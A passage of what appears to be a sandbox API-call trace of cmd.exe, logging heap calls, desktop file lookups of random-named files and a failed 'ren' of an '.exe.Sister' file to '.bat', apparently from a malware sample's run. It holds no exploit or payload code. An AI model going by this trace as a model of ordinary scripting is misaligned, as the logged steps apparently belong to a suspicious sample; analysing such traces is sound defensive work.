nFileSizeHigh=0x0, nFileSizeLow=0x11c9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="rcZz1_vwUIy4k7qcs3.mp3", cAlternateFileName="")) returned 0 [0176.407] GetLastError () returned 0x12 [0176.407] FindClose (in: hFindFile=0x21ed8d64fe0 | out: hFindFile=0x21ed8d64fe0) returned 1 [0176.407] ??_V@YAXPEAX@Z () returned 0x1 [0176.407] ??_V@YAXPEAX@Z () returned 0x1 [0176.407] ??_V@YAXPEAX@Z () returned 0x1 [0176.410] ??_V@YAXPEAX@Z () returned 0x1 [0176.410] GetProcessHeap () returned 0x21ed8c70000 [0176.410] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d657c0 [0176.410] GetProcessHeap () returned 0x21ed8c70000 [0176.410] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95800, Size=0x16) returned 0x21ed8c95a80 [0176.410] GetProcessHeap () returned 0x21ed8c70000 [0176.410] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95a80) returned 0x16 [0176.410] GetProcessHeap () returned 0x21ed8c70000 [0176.410] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0176.410] GetProcessHeap () returned 0x21ed8c70000 [0176.410] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0176.410] GetProcessHeap () returned 0x21ed8c70000 [0176.410] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed937a2d0 [0176.410] GetProcessHeap () returned 0x21ed8c70000 [0176.410] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a2d0, Size=0xb2) returned 0x21ed937a2d0 [0176.410] GetProcessHeap () returned 0x21ed8c70000 [0176.411] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a2d0) returned 0xb2 [0176.411] GetProcessHeap () returned 0x21ed8c70000 [0176.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9507500 [0176.411] GetProcessHeap () returned 0x21ed8c70000 [0176.411] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9507500, Size=0x30) returned 0x21ed9507500 [0176.411] GetProcessHeap () returned 0x21ed8c70000 [0176.411] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9507500) returned 0x30 [0176.411] GetProcessHeap () returned 0x21ed8c70000 [0176.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9507540 [0176.411] malloc (_Size=0x1ff9c) returned 0x21ed961ff40 [0176.414] GetProcessHeap () returned 0x21ed8c70000 [0176.415] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937db10 [0176.415] GetProcessHeap () returned 0x21ed8c70000 [0176.415] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937e110 [0176.415] ??_V@YAXPEAX@Z () returned 0x1 [0176.415] malloc (_Size=0x1ff9c) returned 0x21ed961ff40 [0176.415] GetProcessHeap () returned 0x21ed8c70000 [0176.415] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d750 [0176.415] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed961ff40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0176.415] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9378d70, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65400 [0176.415] FindClose (in: hFindFile=0x21ed8d65400 | out: hFindFile=0x21ed8d65400) returned 1 [0176.415] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9378d70, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65220 [0176.416] FindClose (in: hFindFile=0x21ed8d65220 | out: hFindFile=0x21ed8d65220) returned 1 [0176.416] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x93bf9a02, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x93bf9a02, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9378d70, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65820 [0176.416] FindClose (in: hFindFile=0x21ed8d65820 | out: hFindFile=0x21ed8d65820) returned 1 [0176.416] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x93bf9a02, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x93bf9a02, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd9378d70, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0176.416] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0176.417] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0176.418] GetProcessHeap () returned 0x21ed8c70000 [0176.419] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d66fb0 [0176.419] ??_V@YAXPEAX@Z () returned 0x1 [0176.419] ??_V@YAXPEAX@Z () returned 0x1 [0176.419] GetProcessHeap () returned 0x21ed8c70000 [0176.419] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9507540, Size=0x490) returned 0x21ed9507540 [0176.419] GetProcessHeap () returned 0x21ed8c70000 [0176.419] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9507540) returned 0x490 [0176.419] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0176.419] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.419] GetFileType (hFile=0x50) returned 0x2 [0176.419] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.419] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0176.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.427] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0176.444] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0176.444] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0176.445] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0176.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.445] GetFileType (hFile=0x50) returned 0x2 [0176.445] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.445] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0176.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.460] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0176.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.472] GetFileType (hFile=0x50) returned 0x2 [0176.472] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.472] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0176.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.487] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9507510*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9507510*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0176.508] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0176.508] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.508] GetFileType (hFile=0x50) returned 0x2 [0176.508] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.508] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0176.517] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.517] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0176.534] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0176.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.535] GetFileType (hFile=0x50) returned 0x2 [0176.535] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.535] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0176.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.548] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0176.564] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0176.583] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0176.583] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0176.583] malloc (_Size=0xffce) returned 0x21ed961ff40 [0176.583] ??_V@YAXPEAX@Z () returned 0x21ed961ff40 [0176.583] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0176.584] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0176.584] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0176.584] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0176.584] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0176.584] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0176.584] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0176.584] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0176.584] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0176.584] ??_V@YAXPEAX@Z () returned 0x1 [0176.584] GetProcessHeap () returned 0x21ed8c70000 [0176.584] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937b3b0 [0176.584] GetProcessHeap () returned 0x21ed8c70000 [0176.584] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937b3b0, Size=0x130) returned 0x21ed937b3b0 [0176.584] GetProcessHeap () returned 0x21ed8c70000 [0176.584] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b3b0) returned 0x130 [0176.584] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.584] malloc (_Size=0xffce) returned 0x21ed961ff40 [0176.584] ??_V@YAXPEAX@Z () returned 0x21ed961ff40 [0176.584] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.585] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed961ff40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0176.586] ??_V@YAXPEAX@Z () returned 0x1 [0176.586] GetProcessHeap () returned 0x21ed8c70000 [0176.586] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62450 [0176.586] GetProcessHeap () returned 0x21ed8c70000 [0176.586] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937b4f0 [0176.587] GetProcessHeap () returned 0x21ed8c70000 [0176.587] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937b4f0, Size=0x130) returned 0x21ed937b4f0 [0176.587] GetProcessHeap () returned 0x21ed8c70000 [0176.587] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b4f0) returned 0x130 [0176.587] malloc (_Size=0xffce) returned 0x21ed961ff40 [0176.587] ??_V@YAXPEAX@Z () returned 0x21ed961ff40 [0176.587] GetProcessHeap () returned 0x21ed8c70000 [0176.587] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65820 [0176.587] GetProcessHeap () returned 0x21ed8c70000 [0176.587] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed94828a0 [0176.587] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0176.587] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0176.587] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0176.587] GetLastError () returned 0x2 [0176.587] GetProcessHeap () returned 0x21ed8c70000 [0176.587] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed95079e0 [0176.587] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed95079f0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0176.587] SetErrorMode (uMode=0x0) returned 0x0 [0176.588] SetErrorMode (uMode=0x1) returned 0x0 [0176.588] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed961ff40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0176.588] SetErrorMode (uMode=0x0) returned 0x1 [0176.588] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0176.588] GetProcessHeap () returned 0x21ed8c70000 [0176.588] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9482b10 [0176.588] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0176.588] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0176.588] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0176.588] GetLastError () returned 0x2 [0176.588] ??_V@YAXPEAX@Z () returned 0x1 [0176.588] malloc (_Size=0xffce) returned 0x21ed961ff40 [0176.588] ??_V@YAXPEAX@Z () returned 0x21ed961ff40 [0176.588] malloc (_Size=0xffce) returned 0x21ed962ff20 [0176.588] ??_V@YAXPEAX@Z () returned 0x21ed962ff20 [0176.591] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0176.591] GetLastError () returned 0x2 [0176.591] _get_osfhandle (_FileHandle=2) returned 0x54 [0176.591] GetFileType (hFile=0x54) returned 0x2 [0176.591] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0176.591] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0176.601] _get_osfhandle (_FileHandle=2) returned 0x54 [0176.601] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0176.609] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0176.609] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0176.609] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0176.639] longjmp () [0176.639] ??_V@YAXPEAX@Z () returned 0x1 [0176.639] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2eb2f0, ftCreationTime.dwHighDateTime=0x1d5ea33, ftLastAccessTime.dwLowDateTime=0x490cc6e0, ftLastAccessTime.dwHighDateTime=0x1d5ed48, ftLastWriteTime.dwLowDateTime=0x490cc6e0, ftLastWriteTime.dwHighDateTime=0x1d5ed48, nFileSizeHigh=0x0, nFileSizeLow=0xe80d, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="rJUrds91A0r_fz.png", cAlternateFileName="")) returned 1 [0176.639] GetProcessHeap () returned 0x21ed8c70000 [0176.639] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379ef0, Size=0x3ec) returned 0x21ed937b630 [0176.639] GetProcessHeap () returned 0x21ed8c70000 [0176.639] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b630) returned 0x3ec [0176.640] GetProcessHeap () returned 0x21ed8c70000 [0176.640] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95179d0 [0176.640] GetProcessHeap () returned 0x21ed8c70000 [0176.640] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95179d0, Size=0x30) returned 0x21ed95179d0 [0176.640] GetProcessHeap () returned 0x21ed8c70000 [0176.640] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95179d0) returned 0x30 [0176.640] GetProcessHeap () returned 0x21ed8c70000 [0176.640] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9517a10 [0176.641] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0176.642] GetProcessHeap () returned 0x21ed8c70000 [0176.642] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed937ad70 [0176.642] ??_V@YAXPEAX@Z () returned 0x1 [0176.642] GetProcessHeap () returned 0x21ed8c70000 [0176.642] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9517a10, Size=0x1a0) returned 0x21ed9517a10 [0176.642] GetProcessHeap () returned 0x21ed8c70000 [0176.642] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9517a10) returned 0x1a0 [0176.642] GetProcessHeap () returned 0x21ed8c70000 [0176.642] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9517bc0 [0176.642] GetProcessHeap () returned 0x21ed8c70000 [0176.642] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9517bc0, Size=0x290) returned 0x21ed9517bc0 [0176.642] GetProcessHeap () returned 0x21ed8c70000 [0176.642] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9517bc0) returned 0x290 [0176.642] GetProcessHeap () returned 0x21ed8c70000 [0176.642] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9517e60 [0176.642] GetProcessHeap () returned 0x21ed8c70000 [0176.642] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9517e60, Size=0x30) returned 0x21ed9517e60 [0176.643] GetProcessHeap () returned 0x21ed8c70000 [0176.643] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9517e60) returned 0x30 [0176.643] GetProcessHeap () returned 0x21ed8c70000 [0176.643] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9517ea0 [0176.643] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0176.643] GetProcessHeap () returned 0x21ed8c70000 [0176.643] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed937b070 [0176.643] ??_V@YAXPEAX@Z () returned 0x1 [0176.643] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0176.643] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64f80 [0176.643] FindClose (in: hFindFile=0x21ed8d64f80 | out: hFindFile=0x21ed8d64f80) returned 1 [0176.643] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d651c0 [0176.644] FindClose (in: hFindFile=0x21ed8d651c0 | out: hFindFile=0x21ed8d651c0) returned 1 [0176.644] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x93bf9a02, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x93bf9a02, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64b00 [0176.644] FindClose (in: hFindFile=0x21ed8d64b00 | out: hFindFile=0x21ed8d64b00) returned 1 [0176.644] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rJUrds91A0r_fz.png", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2eb2f0, ftCreationTime.dwHighDateTime=0x1d5ea33, ftLastAccessTime.dwLowDateTime=0x490cc6e0, ftLastAccessTime.dwHighDateTime=0x1d5ed48, ftLastWriteTime.dwLowDateTime=0x490cc6e0, ftLastWriteTime.dwHighDateTime=0x1d5ed48, nFileSizeHigh=0x0, nFileSizeLow=0xe80d, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="rJUrds91A0r_fz.png", cAlternateFileName="RJURDS~1.PNG")) returned 0x21ed8d64f80 [0176.644] FindClose (in: hFindFile=0x21ed8d64f80 | out: hFindFile=0x21ed8d64f80) returned 1 [0176.644] _wcsnicmp (_String1="RJURDS~1.PNG", _String2="rJUrds91A0r_fz.png", _MaxCount=0x12) returned 69 [0176.644] malloc (_Size=0x1ff9c) returned 0x21ed963ff00 [0176.645] ??_V@YAXPEAX@Z () returned 0x21ed963ff00 [0176.647] GetProcessHeap () returned 0x21ed8c70000 [0176.647] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed937adb0 [0176.647] ??_V@YAXPEAX@Z () returned 0x1 [0176.647] ??_V@YAXPEAX@Z () returned 0x1 [0176.647] GetProcessHeap () returned 0x21ed8c70000 [0176.647] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, 